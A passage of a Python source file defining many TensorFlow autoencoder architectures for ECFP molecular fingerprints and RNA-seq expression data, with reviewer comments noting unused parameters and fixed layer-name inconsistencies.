        test = not self.is_training  # NOTE(review): unused in this variant
        fc1 = linear_layer(x, "fc1", 100, stddev=.005, wd=.004)
        return fc1

    # Building the decoder
    def decoder(self, x):
        test = not self.is_training
        de_fc1 = linear_layer(x, 'de_fc1', self.width, stddev=.005, wd=.004)
        return de_fc1
class AutoEncoder_Chem_ECFP:
    """5-layer autoencoder for ECFP fingerprints: width-2000-1000-500-250-100."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # NOTE(review): unused; no batch-norm in this variant
        fc1 = linear_layer(x, "fc1", 2000, stddev=.01, wd=.004)
        fc2 = linear_layer(fc1, "fc2", 1000, stddev=.01, wd=.004)
        fc3 = linear_layer(fc2, "fc3", 500, stddev=.01, wd=.004)
        fc4 = linear_layer(fc3, "fc4", 250, stddev=.01, wd=.004)
        fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.01, wd=.004)
        return fc5_out

    # Building the decoder
    def decoder(self, x):
        test = not self.is_training
        de_fc1 = linear_layer(x, "de_fc1", 250, stddev=.01, wd=.004)
        de_fc2 = linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=.004)
        de_fc3 = linear_layer(de_fc2, "de_fc3", 1000, stddev=.01, wd=.004)
        de_fc4 = linear_layer(de_fc3, "de_fc4", 2000, stddev=.01, wd=.004)
        de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.01, wd=.004)
        return de_fc5_out
def intense_sigmoid(X, name=None):
    """Sigmoid applied to a scaled copy of the logits.

    The scale factor is currently 1 (plain sigmoid); it exists as a tunable
    steepness knob. `name` is accepted for layer-API compatibility but unused.
    """
    scale = 1
    scaled_logits = scale * X
    return tf.nn.sigmoid(scaled_logits)
class AutoEncoder_Chem_ECFP_sig:
    """Like AutoEncoder_Chem_ECFP, but with an intense_sigmoid output (for binary fingerprints)."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_sig")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # NOTE(review): unused; no batch-norm in this variant
        fc1 = linear_layer(x, "fc1", 2000, stddev=.01, wd=.004)
        fc2 = linear_layer(fc1, "fc2", 1000, stddev=.01, wd=.004)
        fc3 = linear_layer(fc2, "fc3", 500, stddev=.01, wd=.004)
        fc4 = linear_layer(fc3, "fc4", 250, stddev=.01, wd=.004)
        fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.01, wd=.004)
        return fc5_out

    # Building the decoder
    def decoder(self, x):
        test = not self.is_training
        de_fc1 = linear_layer(x, "de_fc1", 250, stddev=.01, wd=.004)
        de_fc2 = linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=.004)
        de_fc3 = linear_layer(de_fc2, "de_fc3", 1000, stddev=.01, wd=.004)
        de_fc4 = linear_layer(de_fc3, "de_fc4", 2000, stddev=.01, wd=.004)
        # Sigmoid output keeps reconstructions in (0, 1), matching bit-vector inputs.
        de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.01, wd=.004, nonlinearity=intense_sigmoid)
        return de_fc5_out
class AutoEncoder_Chem_ECFP_sig_bn:
    """Batch-normalized variant of AutoEncoder_Chem_ECFP_sig (sigmoid output)."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_sig_bn")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x):
        test = not self.is_training  # batch-norm uses running stats at test time
        fc1 = batch_normalized_linear_layer(x, "fc1", 2000, stddev=.01, wd=.004, test=test)
        fc2 = batch_normalized_linear_layer(fc1, "fc2", 1000, stddev=.01, wd=.004, test=test)
        fc3 = batch_normalized_linear_layer(fc2, "fc3", 500, stddev=.01, wd=.004, test=test)
        fc4 = batch_normalized_linear_layer(fc3, "fc4", 250, stddev=.01, wd=.004, test=test)
        fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.01, wd=.004)
        return fc5_out

    # Building the decoder
    def decoder(self, x):
        test = not self.is_training
        de_fc1 = batch_normalized_linear_layer(x, "de_fc1", 250, stddev=.01, wd=.004, test=test)
        de_fc2 = batch_normalized_linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=.004, test=test)
        de_fc3 = batch_normalized_linear_layer(de_fc2, "de_fc3", 1000, stddev=.01, wd=.004, test=test)
        de_fc4 = batch_normalized_linear_layer(de_fc3, "de_fc4", 2000, stddev=.01, wd=.004, test=test)
        de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.01, wd=.004, nonlinearity=intense_sigmoid)
        return de_fc5_out
class AutoEncoder_ECFP_Two:
    """Two-layer ECFP autoencoder (100-100 encoder); takes keep_prob/weight_decay hooks."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_two")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        # NOTE(review): keep_prob and weight_decay are accepted but not used here.
        test = not self.is_training
        fc1 = linear_layer(x, "fc1", 100, stddev=.04, wd=None)
        fc2_out = linear_layer(fc1, "fc2_out", 100, stddev=.04, wd=None)
        return fc2_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        de_fc1 = linear_layer(x, "de_fc1", 100, stddev=.04, wd=None)
        de_fc2_out = linear_layer(de_fc1, 'de_fc2_out', self.width, stddev=.04, \
            wd=None, nonlinearity=tf.nn.relu)
        return de_fc2_out
class AutoEncoder_ECFP_Three:
    """Three-layer ECFP autoencoder: width-500-250-100, sigmoid reconstruction."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_three")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        # NOTE(review): keep_prob and weight_decay are accepted but not used here.
        test = not self.is_training
        fc1 = linear_layer(x, "fc1", 500, stddev=.04, wd=None)
        fc2 = linear_layer(fc1, 'fc2', 250, stddev=.04, wd=None)
        fc3_out = linear_layer(fc2, "fc3_out", 100, stddev=.04, wd=None)
        return fc3_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        de_fc1 = linear_layer(x, "de_fc1", 250, stddev=.04, wd=None)
        de_fc2 = linear_layer(de_fc1, "de_fc2", 500, stddev=.04, wd=None)
        de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.04, \
            wd=None, nonlinearity=tf.sigmoid)
        return de_fc3_out
class AutoEncoder_ECFP_Five:
    """Five-layer ECFP autoencoder: width-200-150-100-100-100, sigmoid reconstruction."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_three")  # NOTE(review): message says "three" — presumably a copy-paste slip
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        # NOTE(review): keep_prob and weight_decay are accepted but not used here.
        test = not self.is_training
        fc1 = linear_layer(x, "fc1", 200, stddev=.04, wd=None)
        fc2 = linear_layer(fc1, 'fc2', 150, stddev=.04, wd=None)
        fc3 = linear_layer(fc2, "fc3", 100, stddev=.04, wd=None)
        fc4 = linear_layer(fc3, "fc4", 100, stddev=.04, wd=None)
        fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.04, wd=None)
        return fc5_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        de_fc1 = linear_layer(x, "de_fc1", 100, stddev=.04, wd=None)
        de_fc2 = linear_layer(de_fc1, "de_fc2", 100, stddev=.04, wd=None)
        de_fc3 = linear_layer(de_fc2, "de_fc3", 150, stddev=.04, wd=None)
        de_fc4 = linear_layer(de_fc3, "de_fc4", 200, stddev=.04, wd=None)
        de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.04, \
            wd=None, nonlinearity=tf.sigmoid)
        return de_fc5_out
class AutoEncoder_ECFP_SELU_Two:
    """Two-layer SELU autoencoder (100-100); weights use 1/fan-in stddev per SELU init."""

    def __init__(self, numFeatures, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_two_SELU")
        self.width = numFeatures
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        f1_width = 100
        fc1 = linear_layer(x, 'fc1', f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
            nonlinearity=selu)
        # Bottleneck width is saved so the decoder can size its first layer's init.
        self.f2_out_width = 100
        fc2_out = linear_layer(fc1, "fc2_out", self.f2_out_width, stddev=math.sqrt(1./f1_width), \
            wd=weight_decay, nonlinearity=selu)
        return fc2_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        f1_width = 100
        de_fc1 = linear_layer(x, "de_fc1", f1_width, stddev=math.sqrt(1./self.f2_out_width), \
            wd=weight_decay, nonlinearity=selu)
        de_fc2_out = linear_layer(de_fc1, 'de_fc2_out', self.width, stddev=math.sqrt(1./f1_width), \
            wd=weight_decay, nonlinearity=tf.nn.relu)
        return de_fc2_out
class AutoEncoder_ECFP_SELU_Five:
    """Five-layer SELU autoencoder (200-150-100-100-100); input width taken from x at build time."""

    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_SELU_Five")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        # Input width is discovered from the tensor rather than passed to __init__.
        self.width = x.get_shape().as_list()[1]
        f1_width = 200
        fc1 = linear_layer(x, "ecfps5_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
            nonlinearity=selu)
        f2_width = 150
        fc2 = linear_layer(fc1, 'ecfps5_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
            nonlinearity=selu)
        f3_width = 100
        fc3 = linear_layer(fc2, 'ecfps5_fc3', f3_width, stddev=math.sqrt(1./f2_width), wd=weight_decay, \
            nonlinearity=selu)
        f4_width = 100
        fc4 = linear_layer(fc3, 'ecfps5_fc4', f4_width, stddev=math.sqrt(1./f3_width), wd=weight_decay, \
            nonlinearity=selu)
        self.f5_out_width = 100
        fc5_out = linear_layer(fc4, "ecfps5_fc5_out", self.f5_out_width, stddev=math.sqrt(1./f4_width), \
            wd=weight_decay, nonlinearity=selu)
        return fc5_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        f1_width = 100
        de_fc1 = linear_layer(x, "ecfps5_de_fc1", f1_width, stddev=math.sqrt(1./self.f5_out_width), \
            wd=weight_decay, nonlinearity=selu)
        f2_width = 100
        de_fc2 = linear_layer(de_fc1, "ecfps5_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
            wd=weight_decay, nonlinearity=selu)
        f3_width = 150
        de_fc3 = linear_layer(de_fc2, "ecfps5_de_fc3", f3_width, stddev=math.sqrt(1./f2_width), \
            wd=weight_decay, nonlinearity=selu)
        f4_width = 200
        de_fc4 = linear_layer(de_fc3, "ecfps5_de_fc4", f4_width, stddev=math.sqrt(1./f3_width), \
            wd=weight_decay, nonlinearity=selu)
        de_fc5_out = linear_layer(de_fc4, 'ecfps5_de_fc5_out', self.width, stddev=math.sqrt(1./f4_width), \
            wd=weight_decay, nonlinearity=tf.nn.relu)
        return de_fc5_out
class AutoEncoder_ECFP_SELU:
    """Three-layer SELU autoencoder (500-250-100); encoder supports variable reuse."""

    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for ECFP_three_SELU")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        test = not self.is_training
        # Input width is discovered from the tensor rather than passed to __init__.
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        f1_width = 500
        fc1 = linear_layer(x, "ecfps_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        f2_width = 250
        fc2 = linear_layer(fc1, 'ecfps_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        self.f3_out_width = 100
        fc3_out = linear_layer(fc2, "ecfps_fc3_out", self.f3_out_width, stddev=math.sqrt(1./f2_width), \
            wd=weight_decay, nonlinearity=selu, reuse=reuse)
        return fc3_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        f1_width = 250
        de_fc1 = linear_layer(x, "ecfps_de_fc1", f1_width, stddev=math.sqrt(1./self.f3_out_width), \
            wd=weight_decay, nonlinearity=selu)
        f2_width = 500
        de_fc2 = linear_layer(de_fc1, "ecfps_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
            wd=weight_decay, nonlinearity=selu)
        de_fc3_out = linear_layer(de_fc2, 'ecfps_de_fc3_out', self.width, stddev=math.sqrt(1./f2_width), \
            wd=weight_decay, nonlinearity=tf.nn.relu)
        print("out layer has width", self.width)
        return de_fc3_out
class RNASEQ_SELU_big:
    """SELU autoencoder for RNA-seq profiles: width-5000-2000-400-200 bottleneck."""

    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for RNASEQ_SELU_big")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        test = not self.is_training
        # Input width is discovered from the tensor rather than passed to __init__.
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        f1_width = 5000
        fc1 = linear_layer(x, "rnasb_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        f2_width = 2000
        fc2 = linear_layer(fc1, 'rnasb_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        f3_width = 400
        fc3 = linear_layer(fc2, 'rnasb_fc3', f3_width, stddev=math.sqrt(1./f2_width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        self.f4_out_width = 200
        # Linear (no-activation) bottleneck with Xavier init.
        fc4_out = linear_layer(fc3, "rnasb_fc4_out", self.f4_out_width, stddev='Xav', \
            wd=weight_decay, nonlinearity=None, reuse=reuse)
        return fc4_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        f1_width = 400
        de_fc1 = linear_layer(x, "rnasb_de_fc1", f1_width, stddev=math.sqrt(1./self.f4_out_width), \
            wd=weight_decay, nonlinearity=selu)
        f2_width = 2000
        de_fc2 = linear_layer(de_fc1, "rnasb_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
            wd=weight_decay, nonlinearity=selu)
        f3_width = 5000
        de_fc3 = linear_layer(de_fc2, "rnasb_de_fc3", f3_width, stddev=math.sqrt(1./f2_width), \
            wd=weight_decay, nonlinearity=selu)
        de_fc4_out = linear_layer(de_fc3, 'rnasb_de_fc4_out', self.width, stddev='Xav', \
            wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return de_fc4_out
class RNASEQ_RELU_big:
    """ReLU autoencoder for RNA-seq profiles: width-5000-2000-400-200 bottleneck.

    Mirrors RNASEQ_SELU_big, but with ReLU activations and Xavier init throughout,
    and a distinct layer-name prefix so both nets can coexist in one graph.
    """

    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for RNASEQ_RELU_big")
        self.is_training = is_training
        self.pfx = "rnarb"  # unique layer-name prefix for this architecture

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        test = not self.is_training
        # Input width is discovered from the tensor rather than passed to __init__.
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        f1_width = 5000
        fc1 = linear_layer(x, self.pfx + "_fc1", f1_width, stddev='Xav', wd=weight_decay, \
            nonlinearity=tf.nn.relu, reuse=reuse)
        f2_width = 2000
        fc2 = linear_layer(fc1, self.pfx + "_fc2", f2_width, stddev='Xav', wd=weight_decay, \
            nonlinearity=tf.nn.relu, reuse=reuse)
        f3_width = 400
        # BUG FIX: was self.pfx+'fc3' (missing underscore), inconsistent with every
        # other layer name in this class.
        fc3 = linear_layer(fc2, self.pfx + "_fc3", f3_width, stddev='Xav', wd=weight_decay, \
            nonlinearity=tf.nn.relu, reuse=reuse)
        self.f4_out_width = 200
        # BUG FIX: was hard-coded "rnasb_fc4_out", which collides with the variable
        # names of RNASEQ_SELU_big when both networks are built in the same graph.
        fc4_out = linear_layer(fc3, self.pfx + "_fc4_out", self.f4_out_width, stddev='Xav', \
            wd=weight_decay, nonlinearity=None, reuse=reuse)
        return fc4_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        test = not self.is_training
        f1_width = 400
        de_fc1 = linear_layer(x, self.pfx + "_de_fc1", f1_width, stddev='Xav', \
            wd=weight_decay, nonlinearity=tf.nn.relu)
        f2_width = 2000
        de_fc2 = linear_layer(de_fc1, self.pfx + "_de_fc2", f2_width, stddev='Xav', \
            wd=weight_decay, nonlinearity=tf.nn.relu)
        f3_width = 5000
        de_fc3 = linear_layer(de_fc2, self.pfx + "_de_fc3", f3_width, stddev='Xav', \
            wd=weight_decay, nonlinearity=tf.nn.relu)
        # BUG FIX: was self.pfx+'de_fc4_out' (missing underscore).
        de_fc4_out = linear_layer(de_fc3, self.pfx + "_de_fc4_out", self.width, stddev='Xav', \
            wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return de_fc4_out
class RNASEQ_Sig_big:
    """
    Sigmoid autoencoder for RNA-seq features: 5000 -> 2000 -> 400 hidden
    layers feeding a 200-unit linear code, with a mirrored decoder.  All
    layers use Xavier initialization.
    """

    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for RNASEQ_Sig_big")
        self.is_training = is_training
        # Prefix for every variable-scope name created by this model.
        self.pfx = "rnasigb"

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Map input x to a 200-dim linear code; sets self.width and self.f4_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        f1_width = 5000
        fc1 = linear_layer(x, self.pfx + "_fc1", f1_width, stddev='Xav', wd=weight_decay,
                           nonlinearity=tf.nn.sigmoid, reuse=reuse)
        f2_width = 2000
        fc2 = linear_layer(fc1, self.pfx + '_fc2', f2_width, stddev='Xav', wd=weight_decay,
                           nonlinearity=tf.nn.sigmoid, reuse=reuse)
        f3_width = 400
        # FIX: was self.pfx+'fc3' (missing underscore), inconsistent with the
        # other layer names in this model.
        fc3 = linear_layer(fc2, self.pfx + '_fc3', f3_width, stddev='Xav', wd=weight_decay,
                           nonlinearity=tf.nn.sigmoid, reuse=reuse)
        self.f4_out_width = 200
        # FIX: was the literal "rnasb_fc4_out", which collides with
        # RNASEQ_SELU_big's output layer if both models are built in one graph.
        # NOTE: checkpoints saved under the old scope names will not restore.
        fc4_out = linear_layer(fc3, self.pfx + "_fc4_out", self.f4_out_width, stddev='Xav',
                               wd=weight_decay, nonlinearity=None, reuse=reuse)
        return fc4_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the input features from a 200-dim code produced by encoder()."""
        test = not self.is_training
        f1_width = 400
        de_fc1 = linear_layer(x, self.pfx + "_de_fc1", f1_width, stddev='Xav',
                              wd=weight_decay, nonlinearity=tf.nn.sigmoid)
        f2_width = 2000
        de_fc2 = linear_layer(de_fc1, self.pfx + "_de_fc2", f2_width, stddev='Xav',
                              wd=weight_decay, nonlinearity=tf.nn.sigmoid)
        f3_width = 5000
        de_fc3 = linear_layer(de_fc2, self.pfx + "_de_fc3", f3_width, stddev='Xav',
                              wd=weight_decay, nonlinearity=tf.nn.sigmoid)
        # FIX: was self.pfx+'de_fc4_out' (missing underscore).
        de_fc4_out = linear_layer(de_fc3, self.pfx + '_de_fc4_out', self.width, stddev='Xav',
                                  wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return de_fc4_out
class RNASEQ_SELU_bigger:
    """
    Five-layer SELU autoencoder for RNA-seq features with a 200-unit code.
    The encoder funnels 5000 -> 2000 -> 1000 -> 500 -> 200 and the decoder
    mirrors it; hidden layers use the 'selu' init, the code/output layers
    use Xavier with no activation.
    """

    def __init__(self, is_training=True):
        # self.width (the input/output feature count) is set lazily by encoder().
        print("AE for RNASEQ_SELU_bigger")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Map input x to a 200-dim linear code; sets self.width and self.f5_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        hidden = x
        for idx, units in enumerate((5000, 2000, 1000, 500), 1):
            hidden = linear_layer(hidden, "rnasbr_fc%d" % idx, units, stddev='selu',
                                  wd=weight_decay, nonlinearity=selu, reuse=reuse)
        self.f5_out_width = 200
        return linear_layer(hidden, "rnasbr_fc5_out", self.f5_out_width, stddev='Xav',
                            wd=weight_decay, nonlinearity=None, reuse=reuse)

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the original feature vector from the 200-dim code."""
        test = not self.is_training
        hidden = x
        for idx, units in enumerate((500, 1000, 2000, 5000), 1):
            hidden = linear_layer(hidden, "rnasbr_de_fc%d" % idx, units, stddev='selu',
                                  wd=weight_decay, nonlinearity=selu)
        out = linear_layer(hidden, 'rnasbr_de_fc5_out', self.width, stddev='Xav',
                           wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return out
class RNASEQ_SELU_sq:
    """
    "Square" SELU autoencoder: three equal 1000-unit hidden layers and a
    200-unit linear code, mirrored in the decoder.  Hidden layers use a
    1/sqrt(fan_in) init; code/output layers use Xavier.
    """

    def __init__(self, is_training=True):
        # self.width (the input/output feature count) is set lazily by encoder().
        print("AE for RNASEQ_SELU_sq")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Map input x to the 200-dim code; records self.width and self.f4_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        hidden, fan_in = x, self.width
        for idx in (1, 2, 3):
            hidden = linear_layer(hidden, 'rnassq_fc%d' % idx, 1000,
                                  stddev=math.sqrt(1. / fan_in), wd=weight_decay,
                                  nonlinearity=selu, reuse=reuse)
            fan_in = 1000
        self.f4_out_width = 200
        return linear_layer(hidden, "rnassq_fc4_out", self.f4_out_width, stddev='Xav',
                            wd=weight_decay, nonlinearity=None, reuse=reuse)

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the original feature vector from the 200-dim code."""
        test = not self.is_training
        hidden, fan_in = x, self.f4_out_width
        for idx in (1, 2, 3):
            hidden = linear_layer(hidden, 'rnassq_de_fc%d' % idx, 1000,
                                  stddev=math.sqrt(1. / fan_in), wd=weight_decay,
                                  nonlinearity=selu)
            fan_in = 1000
        out = linear_layer(hidden, 'rnassq_de_fc4_out', self.width, stddev='Xav',
                           wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return out
class RNASEQ_SELU_1k:
    """
    SELU autoencoder with four 1000-unit encoder layers.  Unlike the other
    variants, the code layer is itself 1000-wide and SELU-activated.
    """

    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        # FIX: previously printed "AE for RNASEQ_SELU_sq" (copy/paste error),
        # which made run logs misidentify the active architecture.
        print("AE for RNASEQ_SELU_1k")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Map input x to a 1000-dim SELU code; sets self.width and self.f4_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        f1_width = 1000
        fc1 = linear_layer(x, "rnas1k_fc1", f1_width, stddev=math.sqrt(1./self.width),
                           wd=weight_decay, nonlinearity=selu, reuse=reuse)
        f2_width = 1000
        fc2 = linear_layer(fc1, 'rnas1k_fc2', f2_width, stddev=math.sqrt(1./f1_width),
                           wd=weight_decay, nonlinearity=selu, reuse=reuse)
        f3_width = 1000
        fc3 = linear_layer(fc2, 'rnas1k_fc3', f3_width, stddev=math.sqrt(1./f2_width),
                           wd=weight_decay, nonlinearity=selu, reuse=reuse)
        self.f4_out_width = 1000
        fc4_out = linear_layer(fc3, "rnas1k_fc4_out", self.f4_out_width,
                               stddev=math.sqrt(1./f3_width), wd=weight_decay,
                               nonlinearity=selu, reuse=reuse)
        return fc4_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the original feature vector from the 1000-dim code."""
        test = not self.is_training
        f1_width = 1000
        de_fc1 = linear_layer(x, "rnas1k_de_fc1", f1_width,
                              stddev=math.sqrt(1./self.f4_out_width),
                              wd=weight_decay, nonlinearity=selu)
        f2_width = 1000
        de_fc2 = linear_layer(de_fc1, "rnas1k_de_fc2", f2_width,
                              stddev=math.sqrt(1./f1_width),
                              wd=weight_decay, nonlinearity=selu)
        f3_width = 1000
        de_fc3 = linear_layer(de_fc2, "rnas1k_de_fc3", f3_width,
                              stddev=math.sqrt(1./f2_width),
                              wd=weight_decay, nonlinearity=selu)
        de_fc4_out = linear_layer(de_fc3, 'rnas1k_de_fc4_out', self.width,
                                  stddev=math.sqrt(1./f3_width),
                                  wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return de_fc4_out
class RNASEQ_SELU:
    # SELU autoencoder for RNA-seq features: 5000 -> 1000 hidden layers
    # feeding a 100-unit SELU-activated code, with a mirrored decoder.
    def __init__(self, is_training=True):
        # self.width is how many features make up the input/output
        print("AE for RNASEQ_SELU")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        # Sets self.width from the incoming tensor and self.f3_out_width (100),
        # which decoder() later reads.  keep_prob is accepted but unused here.
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        f1_width = 5000
        fc1 = linear_layer(x, "rnas_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        f2_width = 1000
        fc2 = linear_layer(fc1, 'rnas_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
            nonlinearity=selu, reuse=reuse)
        self.f3_out_width = 100
        fc3_out = linear_layer(fc2, "rnas_fc3_out", self.f3_out_width, stddev=math.sqrt(1./f2_width), \
            wd=weight_decay, nonlinearity=selu, reuse=reuse)
        return fc3_out

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        # Mirrors the encoder (100 -> 1000 -> 5000 -> self.width, linear output).
        test = not self.is_training
        f1_width = 1000
        de_fc1 = linear_layer(x, "rnas_de_fc1", f1_width, stddev=math.sqrt(1./self.f3_out_width), \
            wd=weight_decay, nonlinearity=selu)
        f2_width = 5000
        # NOTE(review): the scope names 'rnas_e_fc2' / 'rnas_e_fc3_out' below look
        # like typos for 'rnas_de_fc2' / 'rnas_de_fc3_out', but renaming them
        # would invalidate any checkpoints saved under the current names --
        # confirm before changing.
        de_fc2 = linear_layer(de_fc1, "rnas_e_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
            wd=weight_decay, nonlinearity=selu)
        de_fc3_out = linear_layer(de_fc2, 'rnas_e_fc3_out', self.width, stddev=math.sqrt(1./f2_width), \
            wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return de_fc3_out
class RNASEQ_sq:
    """
    "Square" ReLU autoencoder: three equal 1000-unit hidden layers and a
    200-unit ReLU-activated code, mirrored in the decoder.  All layers use
    Xavier initialization; the reconstruction layer is linear.
    """

    def __init__(self, is_training=True):
        # self.width (the input/output feature count) is set lazily by encoder().
        print("AE for RNASEQ_sq")
        self.is_training = is_training

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
        """Map input x to the 200-dim code; records self.width and self.f4_out_width."""
        test = not self.is_training
        self.width = x.get_shape().as_list()[1]
        print("x shape", x.get_shape().as_list())
        print("self.width", self.width)
        hidden = x
        for idx in (1, 2, 3):
            hidden = linear_layer(hidden, 'rnasq_fc%d' % idx, 1000, stddev='Xav',
                                  wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)
        self.f4_out_width = 200
        # Unlike the SELU variants, the code layer here is ReLU-activated.
        return linear_layer(hidden, "rnasq_fc4_out", self.f4_out_width, stddev='Xav',
                            wd=weight_decay, nonlinearity=tf.nn.relu, reuse=reuse)

    # Building the decoder
    def decoder(self, x, keep_prob, weight_decay):
        """Reconstruct the original feature vector from the 200-dim code."""
        test = not self.is_training
        hidden = x
        for idx in (1, 2, 3):
            hidden = linear_layer(hidden, 'rnasq_de_fc%d' % idx, 1000, stddev='Xav',
                                  wd=weight_decay, nonlinearity=tf.nn.relu)
        out = linear_layer(hidden, 'rnasq_de_fc4_out', self.width, stddev='Xav',
                           wd=weight_decay, nonlinearity=None)
        print("out layer has width", self.width)
        return out
class LBEXP_SELU:
    """
    Small SELU autoencoder (200 -> 150 hidden, 100-unit linear code) with
    dropout applied to the input of every encoder layer; the decoder runs
    without dropout.
    """

    def __init__(self, is_training=True):
        # self.width (the input/output feature count) is set lazily by encoder().
        print("AE for LBEXP_selu")
        self.is_training = is_training
        self.code = 'lbexpselu'

    # Building the encoder
    def encoder(self, x, keep_prob, weight_decay, reuse=None):
